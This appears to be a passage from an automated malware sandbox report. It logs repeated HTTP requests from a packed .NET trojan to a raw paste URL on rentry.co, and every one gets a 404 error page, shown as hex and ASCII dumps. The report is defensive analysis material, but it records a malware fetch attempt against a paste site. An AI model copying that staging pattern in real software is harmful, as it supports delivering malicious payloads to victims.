                                                                                        2024-10-18 10:43:34 UTC715INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:34 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:43:34 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:43:34 UTC1007INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 39 64 31 65 33 39 30 62 37 31 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 78 4e 43 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed9d1e390b71',t:'MTcyOTI0ODIxNC4wMDAwMDA=
                                                                                        2024-10-18 10:43:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        45192.168.2.660695104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:35 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:36 UTC660INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:36 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qhUEmF%2F6ii0a%2Fwdqhyl5ac4QKsZh%2FkzfBPssHgLGfBbvGYQ8j3ncGUP87b09bPXmDPUJegJ4QcAKqfFFhFuqwv3h2qRvEpV87UAt0xhV2k6PQnRJnX9I%2FQ%2BW1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eda4cf2e6c3f-DFW
                                                                                        2024-10-18 10:43:36 UTC709INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:36 UTC1369INData Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
                                                                                        2024-10-18 10:43:36 UTC1369INData Raw: 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: o'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:36 UTC1013INData Raw: 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 61 34 63 66 32 65 36 63 33 66 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 78 4e 69 34 77 4d 44
                                                                                        Data Ascii: ootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eda4cf2e6c3f',t:'MTcyOTI0ODIxNi4wMD
                                                                                        2024-10-18 10:43:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        46192.168.2.660697104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:36 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:37 UTC673INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:37 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rY6rHxoqgj1l5FJTz4PS5GlaamPd6v3DUNc9tUSpSHlewOUEy673ZwO15HhIgTzUD4hxOczdGmqI3OHXt5jtkSAXgjweaT7GOGn0xX1S0XYEuCdLZA3qjMWFow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edac8bd3b78f-DFW
                                                                                        2024-10-18 10:43:37 UTC696INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:37 UTC1369INData Raw: 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20
                                                                                        Data Ascii: png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing."
                                                                                        2024-10-18 10:43:37 UTC1369INData Raw: 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f
                                                                                        Data Ascii: || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smoo
                                                                                        2024-10-18 10:43:37 UTC1026INData Raw: 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 61 63 38 62 64 33 62 37 38 66 27 2c 74 3a 27 4d 54 63 79 4f
                                                                                        Data Ascii: "/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edac8bd3b78f',t:'MTcyO
                                                                                        2024-10-18 10:43:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        47192.168.2.660698104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:38 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:38 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:38 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCqZZiKLoFhzfXGbqiwX6%2BH5BMZWFVntfnHph03JGojU%2FvzwgyWhtk55GBfV9r4VLni2tgOCRgQxwRTozvdF6S%2FF6iITaEJqFWTeNDqBkJpzhmT9ZRhahb0q9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edb3ef5fe84f-DFW
                                                                                        2024-10-18 10:43:38 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:38 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:43:38 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:38 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 62 33 65 66 35 66 65 38 34 66 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 78 4f 43 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47edb3ef5fe84f',t:'MTcyOTI0ODIxOC4wMDAwMD
                                                                                        2024-10-18 10:43:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        48192.168.2.660699104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:39 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:39 UTC679INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:39 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jB5xWn8kmIVH73AzhdDm8Lx%2Fd5w7Gbv0uWCrEQosg8ApJxa8HvPltOENgyjIw6TSFL%2BxxODyB%2B5qcli8xygDg0Zj6JY5Fdq0F00WHEenEweXOwrTbUIZ9FZG9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47edbb6df64772-DFW
